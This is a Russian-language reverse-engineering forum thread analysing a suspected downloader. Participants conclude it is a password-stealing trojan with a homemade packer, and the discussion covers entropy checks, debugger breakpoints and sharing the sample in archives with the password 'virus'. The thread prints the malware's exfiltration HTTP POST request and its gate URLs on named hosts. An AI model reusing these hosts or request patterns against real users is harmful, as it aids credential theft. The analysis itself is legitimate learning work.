Вот уже долгое время бьюсь над даунлоадерм... PEiD.v0.95 (скачал с exelab) определяет, как неупакованный.
файл весит 98 кб, говорят, что это много очень для даунлоадера и он может быть на самом деле упакован.
вот что показывает PeID


просто хочу самостоятельно изучать, но вот никак немогу понять что к чему. открыл через Olly дебаггер, но ничего подозрительного не нашел. Проверил на онлайн сервисах -там тоже не нашел IP адрес, откуда хотел качать тело.

сам исходник не похож на шифрованного, но и нет ничего подозрительного.

Может все таки упакован чем то? есть другие методики определять ли тчно или нет?

| Сообщение посчитали полезным:

Чего ты скрин показываешь? Ну если так, то пусть это будет VMProtect. Тело выкладывай под паролем )))

| Сообщение посчитали полезным:

NikolayD

да не хочу на общую терзание )))) хочу как бы чтоб подксазали в чем дела...
могу вам выслать по ПМ, если хотите.

| Сообщение посчитали полезным:

Энтропию глянь если высокая, есть вероятность что паковано/шифровано.

| Сообщение посчитали полезным:

NikolayD

Вот скрин


тут странно немного... 7.12(Packed)

| Сообщение посчитали полезным:

Самопальный упаковщик, имхо. OEP=00001000h, такое обычно на асме получается.

-----
Nulla aetas ad discendum sera

| Сообщение посчитали полезным:

Flint

Теперь как расспаковывать ?

| Сообщение посчитали полезным:

файл выкладывай, без него что-либо обсуждать бессмысленно.

-----
Nulla aetas ad discendum sera

| Сообщение посчитали полезным:

ладно, выладываю уже ))) а то нихрена не могу сам понять что к чему. только пожалуйста расскажите что к чему и как расшифорвали.
пароль на архив - virus

ab3d_01.05.2012_EXELAB.rU.tgz - 0.45004017242902683.rar

| Сообщение посчитали полезным:

Ничем оно не упаковано. Тырит все пароли и пытается коннектиться к нескольким адресам, чтобы всё это слить.

| Сообщение посчитали полезным:

tihiy_grom
Все таки это кейлоггер? а все антивирусы определяют , как даунлоадер...

А по какими признаками это вы определяли? хочу тоже понять где эта функция, которая собиарет инфа (откуда) и куда хочет высылать.

| Сообщение посчитали полезным:

Самопальный двухслойный пакер, второй слой написан на Visual C++ 10.0 (Visual Studio 2010).
Шарится по кустам реестра, по файлам, вытаскивая логины, пароли.

ASCII "PKDFILE0CRYPTED01.0"

-----
Research For Food

| Сообщение посчитали полезным:

Trojan.PWS.Multi.502
отстукивать сюда пытается cerotate.com
и кстати энтропия высокая за счет aplib

-----
Nulla aetas ad discendum sera

| Сообщение посчитали полезным:

Flint
Я так понял это тело второго слоя пакера, ибо под ним лежит ещё одно тело, которое пароли собирает


POST /uxf9r.php HTTP/1.0
Host: winusing.com
Content-Length: 531
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

-----
Research For Food

| Сообщение посчитали полезным:

Проглядел я это. Это дллка, грабит пароли. В ней тоже свои гейты есть http://winusing.com/uxf9r.php
http://onlinetumb.com/uxf9r.php
видимо ее писал другой автор.

-----
Nulla aetas ad discendum sera

| Сообщение посчитали полезным:

Flint пишет:
Это дллка, грабит пароли

EXE

-----
Research For Food

| Сообщение посчитали полезным:

dll



-----
Nulla aetas ad discendum sera

| Сообщение посчитали полезным: daFix, igorca

Беру свои слова обратно, был не прав. Только один слой, но тело вируса подгружает виртуальную dll

f355_01.05.2012_EXELAB.rU.tgz - 5.rar

-----
Research For Food

| Сообщение посчитали полезным:

я так и знал, по этому не хотел вкладывать...
Мне интересовал самое гланое не то - что делает этот Malware, а каким образом рассаковали и по каким сигнатурам решили, что он ворует логины и пароли и куда шлет?

| Сообщение посчитали полезным:

Contrafack пишет:
Мне интересовал самое гланое не то - что делает этот Malware, а каким образом рассаковали и по каким сигнатурам решили, что он ворует логины и пароли и куда шлет?
Ну я загрузил файл в олю и поставил бряк на CreateFileA - вот так и узнал. Хотите тоже научиться - читайте статьи о том, как работать с отладчиком.

| Сообщение посчитали полезным:

А можете выложить расспакованный варинат, с паролем virus ?

| Сообщение посчитали полезным:

эххх.
может все таки кто небудь скажет каким образом поняли, что это упакован, как распаковывали хотябы?

| Сообщение посчитали полезным: